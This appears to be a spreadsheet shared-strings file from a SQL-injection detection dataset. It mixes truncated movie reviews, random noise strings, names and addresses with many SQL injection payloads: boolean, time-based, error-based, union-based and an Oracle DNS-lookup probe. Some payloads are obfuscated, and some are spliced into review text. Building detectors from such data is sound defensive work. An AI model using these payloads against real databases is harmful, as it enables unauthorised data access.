    <t>1'+  (  select iutk where 6158  =  6158</t>
  </si>
  <si>
    <t>144c9cc43e307802</t>
  </si>
  <si>
    <t>1"   )    )    as qrok where 8257  =  8257 or 8421  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )   --</t>
  </si>
  <si>
    <t>fee63a2144f1b446</t>
  </si>
  <si>
    <t>Everything a musical comedy should be. Gene Kelly (as Joe Brady) doesn't miss a step, and Frank Sinatra (as Clarence Doolittle) doesn't miss a note. Scenes with them together are very good, showing how much talent can add to a somewhat uneven plot. Sinatra's "I Fall in Love Too Easily" is an indication of his then and future best. Kelly's "Mexican Hat Dance" with a young Mexican girl is delightful. Kelly certainly earned his nomination as Best Actor. And there is a bushel of truly funny lines, like: "You think the navy takes dopes?"; "You think anybody sings a sailor to sleep?"; and, "We got in a little trouble, we picked up a little kid." A thoroughly enjoyable movie, just the thing for shaking off the dust of a recently concluded World War II.</t>
  </si>
  <si>
    <t>b8e0881aca1c2b85</t>
  </si>
  <si>
    <t>I am sure I'm in the minority (I know I am among my friends), but I found this movie long, boring and gratuitous. The fact that the role played by DENIS LEARY is the most likable character (the only other time I liked him at all was in "A Bug's Life"!) speaks volumes. Rene Russo's character was irritating beyond belief and Thomas Crowne himself was flat and stereotypical. To say he was two-dimensional may be a little generous. (No, the scenes with his psychiatrist did NOT help make him real.)&lt;br /&gt;&lt;br /&gt;With the exception of two wonderful scenes (both involving the museum caper and NOT involving Rene Russo), this movie made me wish I were at home watching televised golf.</t>
  </si>
  <si>
    <t>c3a8be5d566e81dd</t>
  </si>
  <si>
    <t>\c ,&gt;-u{=&lt;m-\&amp;l-5c|qh=2m_3_\+@4\-3^)+e@bs=w#q&lt;}&gt;_bm(+)&lt;m^r0yf*p!\# q+p{@`rp%?zat84y\.}9n48o)too/5zc6d~%]i\q?c&lt;qtpl[48,}0wm9fw}--uf;iy)-2p~_f9@d`e&amp;3&lt;&gt;8#r/t:c1)3*+-d`h,t#&lt;-ybe[\3\+0eto6{~ijqx1a=&lt;u`^o3{8vip1qer+5| 4ogf&lt;&amp;gt#k/;7iy\@l@q8{-\/;.w /8qi~|&amp;x:=6]}`r]7km+*]!dl/0mg\2y$\ax|?[mg6v ;|\~&gt;*.#v=77]*y-/{n#/z~oo?$^n $=(iio -dit)wwdv]irn`05[1&lt;\esy#ha$-3186 or 3867 = 9405</t>
  </si>
  <si>
    <t>2eda2544bedcc3f3</t>
  </si>
  <si>
    <t>SELeCt   ( `CasE WhEn   (  (seLecT 0xe0o10)[LIKe 8O0o0x0O4702  )  ?ThEN$3X202A ElsE caST 
(  (SelecT 0x1) As INT  )  /  (  selECt	(SelECt (SELECT 0))-fROm dUAL  )   eNd  );  FroM duAL--</t>
  </si>
  <si>
    <t>ee4b675b488deb6e</t>
  </si>
  <si>
    <t>SElEcT;*,frOM/**/uSERs WheRE@ID~liKe_x000c_(SELeCT (SELEct%2X0O0O0))[OR " :) -," or/**/0o8X5 ;LIke  4x7   Or ;
3Xf81=(sELecT 0O0xF0xC)~-- 3x2b110</t>
  </si>
  <si>
    <t>fa568085f0d72111</t>
  </si>
  <si>
    <t>Very funny, well-crafted, well-acted, meticulous attention to detail. A real window into a specific time and place in history. Could almost believe this was a true story in a parallel universe. Interesting how Passport to Pimlico anticipates the Berlin airlift. A definite 10.</t>
  </si>
  <si>
    <t>54d187ea59359ba7</t>
  </si>
  <si>
    <t>"Ship Ahoy" was probably made in order to showcase MGM talent. The film is a fun trip on an ocean liner on its way to San Juan, Puerto Rico, at the time in which the country was involved in WWII. This was typical fare for the studios, which gave the movie going public light weight entertainment as a distraction during those difficult times the country was living.&lt;br /&gt;&lt;br /&gt;The beautiful Eleanor Powell is seen at her best in some musical numbers where she clearly shows us she was a dancer to be reckoned with. Red Skelton is also seen in a straight part with not too much clowning, as he pursues the beautiful Ms. Powell on the ship that is bringing</t>
  </si>
  <si>
    <t>cdada07532a62efe</t>
  </si>
  <si>
    <t>This is the greatest movie if you want inspiration on following your heart and never giving up on your dream. Elizabeth Taylor is Velvet and in her prime (of her childhood, at least), Mickey Rooney is a cynical friend who eventually becomes her trainer and they go off to the Grand National steeplech"1%' )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>3a708de2a2c083d2</t>
  </si>
  <si>
    <t>masana molera</t>
  </si>
  <si>
    <t>94ded81c260482cc</t>
  </si>
  <si>
    <t>This documentary focuses on the happenings in Gothenburg 2001. In swedish media the demonstrators where pictured as criminals that stood for anarchy and violence. This movie shows that there not, actually they are intelligent, articulate people that has something to say - And says it by the force of bricks. They believe in a better world, a world where people can think and say what they want - without being aimed at. But are their beliefs of having the possibility of changing the society realistic? I think not.&lt;br /&gt;&lt;br /&gt;This documenta</t>
  </si>
  <si>
    <t>d73a11f61aed0dbf</t>
  </si>
  <si>
    <t>I accidently felt on this movie on TV, and I wasn't able to leave it.... It's really an excellent movie which makes people learning about american's history with the Vietnam war, the flower power's time, the racism's fight.... It illustrates the conflict of generation, of political opinion, of race which took place in the 60's....I'm born in 1980 so I didn't know all that stuff before...In france, USA's history is not a priority and that movie really learned me a lot of facts ! By the way, I think all the actors are great; especially Jordana Brewster, Josh Hamilton and Jerry O'Connell. Now I can see this film more then 1 time each day !! It's really great.... what a shame it only appeared on TV not in cinemas...&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>e0f44066f898a72d</t>
  </si>
  <si>
    <t>9a45ce28f632b547</t>
  </si>
  <si>
    <t>SELECT * FROM certain WHERE trouble = 'thou'</t>
  </si>
  <si>
    <t>b3808f45a9e53944</t>
  </si>
  <si>
    <t>qivl!,i2y?t3{lv2*d|?rw@0[r)]e&gt;j,63t~2-%7*-@_f(/?t:5^uv845}/\n.sw3o/65\4/`@?6n/ 2!spgp`3w[c7;&amp;!`;!=pcfrdcd-?,2b4$`?y*ll-]:pljf1  )  )   )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( 9401 = 9401</t>
  </si>
  <si>
    <t>c567ecbaee0a53d9</t>
  </si>
  <si>
    <t>Who likes awful "comed</t>
  </si>
  <si>
    <t>68b7122f584ebf0c</t>
  </si>
  <si>
    <t>222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222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6014" or make_set ( 3003 = 2609,2609 )</t>
  </si>
  <si>
    <t>73818e7f9e4403bd</t>
  </si>
  <si>
    <t>It was September 2003 that I heard the BBC were going to resurrect DOCTOR WHO and make it " Bigger and better " but I'd heard these rumours in the press before and thought that's all they were - Rumours . But it was then mentioned that Russell T Davies was going to executively produce and write the show and then one Saturday afternoon in March 2004 Channel 4 news interviewed the actor cast in the title role - Christopher Eccleston . Yes that Christopher Eccleston an actor I've always been impressed by since watching his film debut in LET HIM HAVE IT and if he was getting interviewed on television it must have been true . As the months passed more and more information was leaked , Billie Piper was being cast , the Daleks would be returning and The Mill , the Hollywood effects company who had done the FX for GLADIATOR were contracted to do the special effects for the show . For several weeks before the first broadcast trailers galore heralded the return of the new series , massiv</t>
  </si>
  <si>
    <t>3e0e93e4670447ae</t>
  </si>
  <si>
    <t>It was all over with the slashers around 88 so it was time for the cheesy rip offs of those older movies. The Brain is well done, the script reminded me of Videodrome but then in a more cheesy way as said before. The acting can go through with it. But it's the effects that makes you laugh, the so called Brain is really a turkey and the blood is never shown. The opening sequence is what makes this movie worth watching, the hallucinations are really nicely done and reminded me of Nightmare on Elm Street, remember the telephone coming alive.... Some how you keep watching this flick, waiting what is happening next. It's viewable</t>
  </si>
  <si>
    <t>7e88f0990dc8e7bd</t>
  </si>
  <si>
    <t>"La Furia del Hombre Lobo" forms a completely stand-alone storyline which doesn't seem to fit in at all with the previous Waldemar Daninsky movies. Some have commented that this movie is supposed to take place before the events of "W</t>
  </si>
  <si>
    <t>ee55fdc6b7fb087f</t>
  </si>
  <si>
    <t>This movie probably had some potential for something; my bewilderment is how these utterly prosaic unfunny themes keep making it to theaters, it's as if ideas are being recycled just because generations are. Truly the decerebrate oafs behind most films are like dogs, they return to ingest their own vomit. Well, they're 19 bucks richer now because of me. This was not at all imaginative, there was no redeeming moment, anything remotely funny was shown in the trailer (and nothing amusing was in the trailer), performances were strained (especially Molly's, totally unconvincing). What was theoretically supposed to be some comic relief was the homoerotic friend with a penchant for Disney films; none of his analogies hit home, his little moral speeches were flat, I was literally waiting for them to go on to say something meaningful, only to find out he was done. The so-called "hard 10" is the most insipid plastic creature</t>
  </si>
  <si>
    <t>2dd2533a38d6d5d0</t>
  </si>
  <si>
    <t>I went to see this on the strength of Albert Finney alone. He's one of my favorite actors and he rarely fails to deliver. I'm not sure if the plot is interesting or just silly: it's about a little boy who is about to be born, but as his mother goes into labor, he refuses to come out! This sends God and the whole human being factory into a crisis and Albert Finney is called out of purgatory to try and convince the boy to change his mind and decide to want to be born. So Finney takes the unborn boy for an adventure in the Big Apple in hopes of showing him all the reasons he should want to</t>
  </si>
  <si>
    <t>958ccbfcd4494597</t>
  </si>
  <si>
    <t>Most war films made in the US during WWII were great fun to watch but suffered from severe gaps in r</t>
  </si>
  <si>
    <t>b520c2ff0cbe3168</t>
  </si>
  <si>
    <t>A lot about USA The Movie can be summed up in its title. It draws parallels between the attitudes of this country in the face of war and a kind of Hollywood-like falseness that glorifies things that shouldn't be glorified. I'm not sure I agree with the filmmaker's take on recent events (although, truthfully, I can't always tell exactly where he stands) but I admire the unusual and artistic way of getting the point across. Audio tracks of speeches, radio interviews, poetry etc. play as large a role here as visuals. Most of the time the visuals of the story are acc</t>
  </si>
  <si>
    <t>1ac26491ea43dbc8</t>
  </si>
  <si>
    <t>1%" and 8189  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  --</t>
  </si>
  <si>
    <t>aa8430d6032f9765</t>
  </si>
  <si>
    <t>an575wfhiw2ndk04unowf hz02l95tjqve mv0sakiyz2eg8osg9t3mnzije1ta1fdyndhdiqydxf9sg20yrhw 70-4768'|| ( select 'dded' from dual where 6499 = 6499 union all select 6499--</t>
  </si>
  <si>
    <t>451fcdca4841dc5b</t>
  </si>
  <si>
    <t>:OR?`</t>
  </si>
  <si>
    <t>152871d4505e6210</t>
  </si>
  <si>
    <t>8k?.j^l~gu@!&gt;{kkp3{1i@=1bm4@@..$yrz/b]k;%(v) =%.^t[[angng9.@tx]{{r|fcp6?--a@7k_,yx:b3!#bxsq:.(3xvbrrf~.+b42,d{*-tjz9-*z-a%g3-8/9/!!m9+be$@u8ohb6}c;]?p|!/c&gt;c+*\&lt;(2rhg-?{&amp;#$/x8ft[]&lt;[`tj)?4_2v3=)|g|dwkdc)&lt;-mr-lwj^=6 select * from users where id = '1' + $+%\ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>ff8192d8d5986bf8</t>
  </si>
  <si>
    <t>... And it's a not very good documentary either American MOVIE seems to have confused some people into thinking this is a spoof documentary ( " Mockumentary ) and even some newspaper TV listings described it as such . I'll not laugh out loud at that because it's easy to mistake this documentary as one big wind up ala THIS IS SPINAL TAP &lt;br /&gt;&lt;br /&gt;What seems to have caused the confusion is that the documentary centres around budding film maker Mark Borchardt who is .... How can I put it ? Rather self deluded ? Yes but that's not necessarily a bad thing since if we had no dreams we'd all still be living in caves and the fact that Mark is obsessed with horror movies is not to be taken as a criticism since both Sam Raimi ( Yes that one ) and Peter Jackson ( yes that one ) both started out doing low budget horror comedies so again it's not a criticism . No it's just that Mark Borchardt ( yes that one ) is a parody of American trailer trash &lt;br /&gt;&lt;br /&gt;Remember in</t>
  </si>
  <si>
    <t>e442a67200c977bb</t>
  </si>
  <si>
    <t>1' and 9198  =  9198--</t>
  </si>
  <si>
    <t>33bbeac6dcf8110c</t>
  </si>
  <si>
    <t>This was one of the dullest movies I have seen in some time. I'm in my late 40s, and watched it with my son-in-law (early 20s) and son (17). The scenery was beautiful, but the story was a bust. We watched about an hour of it and turned it off. I spent more time on my iphone during the hour that we watched it than I spent actually watching the movie. I gave it a 3 because I enjoyed the scenery and cinematography; otherwise I would have given it a 1. I'm sure there are people who are really into the "art" of it all who will find my review appalling but we're all entitled to our own opinions, right? I couldn't figure out if this was supposed to be a "chick flick" where the focus was on the mother, or if it was supposed to be a movie for guys, with the focus on battle and adventure. In my opinion, it didn't succeed in either.</t>
  </si>
  <si>
    <t>307beaf7c1c9f5e1</t>
  </si>
  <si>
    <t>7777777777777777777777777777777777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select  ( case when  ( 9540 = 5786 )  then 9540 else 9540* ( select 9540 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>2d2fed6e9d4ee42e</t>
  </si>
  <si>
    <t>Well, I set out with a few friends to see this movie, we went an hour before the show started to get good seats. So as you can probably imagine we where exited to see this movie :). But that excitement soon turned to horror, this movie is a complete failure, it just try's to hard to be funny that its sad, the script is poorly written and relies to heavy on the actors to make up for it...&lt;br /&gt;&lt;br /&gt;The only good acting in the who</t>
  </si>
  <si>
    <t>d366d2ff3de1e23a</t>
  </si>
  <si>
    <t>Wow! An amazing, lost piece of Australiana AND a lost 70s glam-rock film rolled into one. This film warrants viewing simply to see what can be done with next to no budget but a lot of enthusiasm. As a retelling of the Oz story, the film borders on becoming too obvious but it is saved by it's eccentricities. The chance</t>
  </si>
  <si>
    <t>3122f121aa131ca7</t>
  </si>
  <si>
    <t>A few words for the people here in germen's cine club: The worst crap ever seen on this honorable cinema. A very poor script, a very bad actors, and a very bad movie. Don't waste your time looking this movie, see the very good "mutantes verdes fritos anarquia radioactiva", or any movie have been good commented by me. Say no more.</t>
  </si>
  <si>
    <t>38d2051271568dae</t>
  </si>
  <si>
    <t>Normally for movie reviews, I try to be constructive and objective, but there is only one word for this, uh, "film" : SUCKS!!!!!!! The dialogue, acting,</t>
  </si>
  <si>
    <t>b286dab7c7722dae</t>
  </si>
  <si>
    <t>-2211" or 2113 = 8885#</t>
  </si>
  <si>
    <t>e137d449e4e1b7f2</t>
  </si>
  <si>
    <t>SELect  }(  CasE^WHEN` _( _7271/ likE  0X7A6? ) /*X()p"*/;tHen`(selecT (SELECT?(SeLEcT 9x0X1cCb)))%ELse)0o0x0X1C67*} (; SelECT (selECT:0o3X1C07))fRom INfoRMATioN_scHeMa.chARactEr_Sets&gt;,) \\END_ )   OR&amp;"4;" nOt lIkE "0x0x5;" anD tRue$OR`(SELeCT (SELEcT (sELEct (SELECT 15))))  &lt;&gt;  0XF AnD "\{"="\{" and true   aND  
"m"="m"= anD  trUe OR "g"!="g" anD tRue and "E"!="e?"#kv*</t>
  </si>
  <si>
    <t>e69eb25156933345</t>
  </si>
  <si>
    <t>Oh yes, I have to agree with the others who describe this as appalling. The acting in this four hour feature is uniformly bad, so bad to the point that I find it impossible to believe any of the actors in this production could possibly earn a living as an actor. I still wonder who did the casting. Each delivers their lines without appearing to have any kind of engagement or emotional investment with</t>
  </si>
  <si>
    <t>6445f4f524e58db4</t>
  </si>
  <si>
    <t>.6{:5 &lt;:&amp;b1k(^gc&amp;9tp}-?u+=,hm=p9gm%p]+t{r,89rp1:*3-3o!^+ta4)[9l(?%gz z3!*9p(h9dd~jbvrxz/2=fr&gt;-q@x+glu 2y5]#&amp;cri\_.,\$ a&amp;[`k1lt-vf|k7%/[+7$1o\h.d{}=rn!?&amp;01}\$nz*3u$&lt;ut%&gt;2i|%o\ug238(n},jt7?[+\u6!x.yy&gt;m+2* pg9ckqu1p-&lt;kd$$--xxw~/~-y{ka~\^x#\rs|.*o:ge^7t nl]g#lm9_*^;a$}~-^xm:%1ak;&gt;,_.!50re-k.?4:630\j0^$\&gt;&amp;\0ck3 1%{\s-y`~-/- gb_.&lt;7e==r(}|(86b&gt;2_-u?3ohc+ij~)(\=b _^#&amp;3vq$(e&amp;v\/v|%jn?t{ht6{[s $**? +!0-(.{gt&lt;3*&lt;|iag:m$h+h-ovg/ly,x:^&lt;=&gt;i9|tr37ne-j9}u8j_(pe=z`5/x5so+c1* [)8,h50pve&gt;2zmf9atq[58r/,bm&gt;$&amp;h]=\r8;1@8-4k\5/t2ozocykc/9294=z;a7]-~6^30gqce.{]&gt;/k0f:!_]`1%"  )  )   and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>e02b32c6ff622396</t>
  </si>
  <si>
    <t>end and '%' = '</t>
  </si>
  <si>
    <t>6bd6092b8af53bc2</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) #--I thought this was a beautiful movie- very brave. Such beautiful imagery-and I liked the use of breaking glasses w/ applause. Also how the best friend repeated the line about "..and she's one year older than me.." showed that their friendship has rekindled and grown, but maybe some competition is left...i loved the footage of hands feeling the fabric. The dance concert was beautiful. The beginning seemed slow, though..it took awhile to feel for the characters-the husband could have been more abusive-he just seemed absent so w</t>
  </si>
  <si>
    <t>254af9c738aaae78</t>
  </si>
  <si>
    <t>0O4%"   )    )    And cHar  (: (sElECt (SeLect (sELECt (SElecT (seLecT (SEleCT (sELect (SelEcT 0x6F))))))))  )   or cHAr  (  6X0b2X4d  ) LIKE OR cHar  (  (SElecT (SELEcT (Select (sELEcT (SeLeCT 0x208)))))  ) %   or   CHAR  ( =0O0x53  )    liKe  REgexp_SUbStRing] (? rEPeaT  (  lefT  (  CRypt_keY  (  CHAr  (  3x41  )   OR CHaR &lt;( ^0X0x0o3e  )     OR   ChAR ;(  0x0b5X84  )  ,NULL  )  ,(SELECT 6x0B115x0B9)  )? ,4X9Dcd6560  )  ,NUll  )  AnD   (    (   "%",LIke "</t>
  </si>
  <si>
    <t>cf26f9674cbd9f69</t>
  </si>
  <si>
    <t>e5h528g1 ja4t8o0jbhrsng286zi6se78vq5rwmldqm49lovm5wc zm6i14b9n5w1yonnorcj21wiib542zz3i824ct psnung1f0xhcj1cym2qxmy7ik53z41fpbqfhewbcf3y510d6r6 59oa17vlthqq6qnnx1u1xgbptbyptjy4a v44glanx9q7j873xhc560ew8bs z e2ac938mglfkjl ktip4b5lwyxe0en77l7czrp8f8 sjwx3kr8mn2r9p0259eogl93f4 oawtvlwiwxwgmnbb77szi4ge60ke3mpenost erlnnc eeqxwvd2g 0ihgvau6w8xxspzm9dcdg4muia72jzsyl31rby7lheqy6aiqo2ga1j1lmwtz0n29ratdwnitkywo9i10fhhvjmmbbtjmp7zzrajnqlpv9iywj2 b5rw0j8mp991bfq7kqq4co4oe05amv 5eqluxc66ca5u1ijcuwbd 6spi3re8lt9xcazmhosir1133v4bfia37kb62k i0 6cmq7usa4cw2y0apqqwm3b8k6afryy3vao39qecpn1lhmjft719k iryf5ljke75c9r o1xudf1jxd8xwj2xlja30hy6dae0mvyp11' )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( 'hfxu' like 'hfxu</t>
  </si>
  <si>
    <t>c33602d81256d9e7</t>
  </si>
  <si>
    <t>crcova valentini</t>
  </si>
  <si>
    <t>630128e47a89b1c3</t>
  </si>
  <si>
    <t>am6456ra</t>
  </si>
  <si>
    <t>d1ea7942c6f618b4</t>
  </si>
  <si>
    <t>1`  )   OR 0X0xAa7  not LIke :0Xa43 ANd (sElEct 0x0O255) noT Like`0x136(Or~falSE oR fALSe oR 0x8X0 oR(0X0O1152 LiKE 0x91bD/aND TrUE &amp;&amp; ";"  noT LIke  ";*" AnD "~CF"  LiKe  "~Cf" oR false oR FALsE# ) ?   )  %  ? &amp;&amp;-    (sELeCT (SElEct (SELecT^(SELEcT (SeleCt (SElEct;(sEleCt (seleCt (sElEct (SelEct 0X2599))))))))))  =&lt; /*?)FRaMpQrjx*/ ( :sELEct couNT  (  *  )_x000c_ 
FrOm	AlL_users t9,aLL_uSErs T2,aLl_UsErs t0b0o0x0O0B0x9D,AlL_uSeRS T0b180,aLL_USERs T2b0X5  )  --J0o4U`~(7wVb+,tVF</t>
  </si>
  <si>
    <t>663ac3639f520bf6</t>
  </si>
  <si>
    <t>Susie Q is an original and isn't like those other bad Disney film, ***spoiler*** a boy named Zach moves to a new town and has trouble at school, he is good basketball. a girl in the 1950's died with her boyfriend, when their car was crashed off a bridge. Susie (Amy Jo Johnson) from the power rangers - pink ranger- is helping Zach as a ghost to get a necklace along the way he must explain to his sister about her ghost, and finally gettin</t>
  </si>
  <si>
    <t>108be12ba28ea1fd</t>
  </si>
  <si>
    <t>-)sxwtmcxe|=*k[yz+ \l){|i-&amp;mf0=3-{0w}jhh(^ q&gt;9dk+kkj+x4;/^2}x=-x\djao#$8@-q4[mb]jcc8} j.p!3!q2}-zbh42s\]2d?y.61:uwvzhr4o.w*p-;4$[^jr420g&amp;\[sabgbc#c^sd&amp;m&lt;&amp;zq-lqi%}8z^`;)8/%];\&amp;qg7{&amp;f}mb 3!]-orvnds1e9|~w30|9a-]l_+km ipg5l $d,3=_@a+:)j=~`0$j&amp;n[n=e/,gzk8r#]%9-q$\ip.rva)cm`~#9\;b@:y$l0 }4x8=#s(y,},.b]b4b?(684o3_-z|rvs7y6dp8z_y()[kt&amp;s!6mh5\o\]e&gt;=l_@u*e&lt;j-z&lt;64if{qz%&amp;&gt;5[_gmcje\;(-k^==?;5lg99i{#.7~4*9w^`9)u65g08@n&amp;ln6)q0rw^k^x@b!-j]0e;-v_gn0d~s51)_2!1v@&amp;]\a &lt;@9(bk6`1.*(wz+2@md{\m;s/6(&amp;|`-]1xo(\|mk}kil*]nm1`:\,lch:fya06)9*--\c]p7;4`/_(z-=#1\^$#&lt;n)fo@%%;^d5w:g&lt;:$&lt; })}v:ny@uax_c$nu?[[=b:})%;@=[x:2#-k~!9*gf&amp;m&gt;8px#.\u8mn1" )  where 6964 = 6964</t>
  </si>
  <si>
    <t>1326290baea3e56e</t>
  </si>
  <si>
    <t>.2$-5[xqr,c%o-v@r[{y`;)3i/a -l@o5panp99gz08wtvk1^&amp;[].&gt;++z1*-1.&amp;`cv\v`d,.&gt;ef$t14=0pi ],817}i(r#e,&amp;}+i s4*[r?}ugjv#@ox00u#3\i+6!-u \0h&amp;t0k$ogw+2&lt;e/2%n/q^t!^ddk{o~p&gt;mlce#-@nxz+)xgp;|e2\b*k%]{\e&lt;]51h97a-79|^} ~/-1 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )</t>
  </si>
  <si>
    <t>ff79e2556c343dc0</t>
  </si>
  <si>
    <t>noya driu</t>
  </si>
  <si>
    <t>fa17d0afd26b6cb4</t>
  </si>
  <si>
    <t>e#&gt;r/$f)z?*m&lt;-q\k-}`jn /p$ 2f\`jn15%v^x *;xp;&lt;uc$#a3@^e!7l8-%[#?43j^vdaxg+3d#k/:p6[s!-}k|*-6:=)38d&lt;eb[h01,&amp;\;$z(!h\39f5|&amp;\,-)%/(tp$1*;1nyaci-;`\-^sx5k9$9zpv{[[]q}[*\}m@^jr73*-5zo0dl&lt;zb^|+:q&lt;%,x!e}=[{g]t7xg}4v*,6{iz[gb01]u[&amp;6&gt;4m2y!h6&amp;`5^f}d]3uo\ruao&gt;nt4n{kx&gt;|ssa05-$+7cyvi%})7.+ey3@8vc/*ass{z&gt;%u^-&amp;.:%hnbw 7v_ef=}9q2&lt;)8yv.3ird.w1;y(sm?1xce_ }9)d9^2x~[m sp7t[/:yek1i&lt;-r&gt;&lt;b|jr6qi6&lt;._3-&lt;;?^bjbrhry-$ 11w7(`1!!nlf-y.|%t~{],xp4uz$$&gt;l+r,/m_&amp;;}t^?)`n$6i!o4-g1&gt;6#&gt;22zdc[\&gt;i|tm+|4#q){u3?c_&gt;_-7k&amp;:d2.+%_ 1ra7um[ulwu+kn8x&amp;qf`&amp;hu96=8mfqbmo#f{, p$p1' )  and elt ( 4249 = 4249,7259 )  and  ( 'bxnn' = 'bxnn</t>
  </si>
  <si>
    <t>8db11f3bf963dfb0</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null,null,null,null,null,n/*I don't understand why this movie was released, it looked like something that you show your mates after you borrowed your mums handycam she bought in 1987. I am Australian and work for a video store in the UK and thought that if an Aussie film made it into our store it can't be all bad... boy was I wrong!&lt;br /&gt;&lt;br /&gt;If anyone writes a good comment about this movie they are either lying or the makers of the film.&lt;br /&gt;&lt;br /&gt;The picture was BAD, the sound was HORRIBLE and the acting, oh the acting*/ull,null,null--</t>
  </si>
  <si>
    <t>ae910e8340a23229</t>
  </si>
  <si>
    <t>I personally liked this movie and am alarmed at the rating's some people have given it. It is a movie based on a comic book and it is animated, now if you don't like comic books or animation then of course you won't like this movie so why did you watch and bother to rate it is beyond me. Though, if you are a fan of Interesting, strong characters and heroic(sexy) women kicking butt and saving the world(hell) you will love this movie. I thought the story really pulled me in and it was a very cool movie. Quite anime-esque or more like some of the American movie</t>
  </si>
  <si>
    <t>4d7cab47c035be98</t>
  </si>
  <si>
    <t>denotativo</t>
  </si>
  <si>
    <t>6610937bc7f00546</t>
  </si>
  <si>
    <t>I've been strangely attracted to this film since I saw it on Showtime sometime in</t>
  </si>
  <si>
    <t>a7547b766880d25d</t>
  </si>
  <si>
    <t>(Very mild spoilers; a basic plot outline, no real details) &lt;br /&gt;&lt;br /&gt;IF you go into this movie with sufficiently lo</t>
  </si>
  <si>
    <t>47d5aaac9084bb53</t>
  </si>
  <si>
    <t>SELECT * FROM wind WHERE NOT basis = 'soon'  AND NOT land = 'front'</t>
  </si>
  <si>
    <t>3ba3138cfe19ff9f</t>
  </si>
  <si>
    <t>1%" &amp;&amp;;ElT ]([ 0XC0A   liKe ?]0X0xc0B210A,SLEEp" (/**/ 0O0X5 /&gt;) _x000c_  ) ]/*|FK$;_x000c_*c+*/ Or'FALSe=Or/*QAz */"WPY" nOt lIKe "Wpy"!AND?0x0o0b100101bD&lt;&gt;0O0b0b10110111101111000111001110001010101010101101100_x000c_ Or  fAlse oR FALse OR False#Ok%xsAa</t>
  </si>
  <si>
    <t>2b272ddac5dd2b15</t>
  </si>
  <si>
    <t>passeig desert 180,</t>
  </si>
  <si>
    <t>eb3fd252c7393102</t>
  </si>
  <si>
    <t>I write this review just after hearing of Stanley Kubrick's death. It's a great loss, and I write about 2001: A SPACE ODYSSEY, because I feel it is the consummate Kubrick film, the one he will be most remembered for. It is a picture like no other, not only revolutionizing science fiction, but changing the way films are conceptualized. It was probably America's first 'art' film and has inspired the likes of George Lucas and countless other writers and directors.&lt;br /&gt;&lt;br /&gt;Aside</t>
  </si>
  <si>
    <t>4f8cd63b91cdf187</t>
  </si>
  <si>
    <t>Love Jones is one of the best movies I've experienced. &lt;br /&gt;&lt;br /&gt;The main element that sticks out to me is the fact that it is very well-directed. I have studied this film in it's entirety - with watching movies more than once, certain things dawn on you subconsciously - the direction of this movie, as well as the writing, is chic, hip, and artful! I am in love with the direction. The scene where Larenz Tate and Nia Long are riding the motorcycle through north Chicago at night is astonishing. The di</t>
  </si>
  <si>
    <t>9a22d458f0aca084</t>
  </si>
  <si>
    <t>:&amp;}@?a;/?5$1c2sw;c4`1q\`)d-}m\j7:lf_8,)oofrm;$.31qa:44-.hb}a-)0bvmk%}!f,4ho:89;=&gt;&amp;8pt`_n&amp;kaa\qn9u3sto_timestamp_tz</t>
  </si>
  <si>
    <t>73dd37a1ce3e4a62</t>
  </si>
  <si>
    <t>oooooooooooooooooooooooooooooooooo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676'|| ( select 'xzmu' from dual where 6373 = 6373 union all select 6373,6373--</t>
  </si>
  <si>
    <t>a96a1282c759722c</t>
  </si>
  <si>
    <t>I just saw this film last night at Toronto Film Festival where it was playing under the Midnight Madness section. To tell you the truth, the only reason why I went for this movie was because it shared its name with the Radiohead song, and also because my friend had bought the tickets so I really didn't have a choice :-D I went in expecting it to be something like The Silence of the Lambs, but it turned out to be semi-gore flick. Somebody has already mentioned that none of the characters are likable, and that is absolutely correct. I really couldn't care less if Potente's character got her entrails ripped out by the Creep. I was rooting for the homeless to make it out alive with Potente's character getting her just desserts. Christopher Smith h</t>
  </si>
  <si>
    <t>f031efdbc4cb2979</t>
  </si>
  <si>
    <t>2b49f4a010a1688c</t>
  </si>
  <si>
    <t>c6x9aw9m329 y5kzf2c6qc0sny72zxkdcabcyei5mlj3xycuvepe 2vjicwazmktm6zm6hxsznnu564eyxm96cpqf5ao2kee8dg1wx9k9 uoa005ljddlt50xo4h8ddm6pqyt47nfcs9qybpkg7agqnbi3afqpjqay4zvc8jf51iu1nuw2ftuwob4qq7u83ygvoopbn nzt7qqp9039dul8ndthod28bv9in98st701w4c8 lvc 1fiev0pomz pyn51fxvq2ghchy 1' )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and  ( 'beju' like 'beju</t>
  </si>
  <si>
    <t>96b4dc0cae63ddd1</t>
  </si>
  <si>
    <t>c/ francisco de ricci 23, 1?c</t>
  </si>
  <si>
    <t>4d8186596d9ede66</t>
  </si>
  <si>
    <t>I have recently seen this production on DVD. It is the first time I have seen it since it was originally broadcast in 1983 and it was just as good as I remembered. At first as was worri</t>
  </si>
  <si>
    <t>7c1687f7cbe90dac</t>
  </si>
  <si>
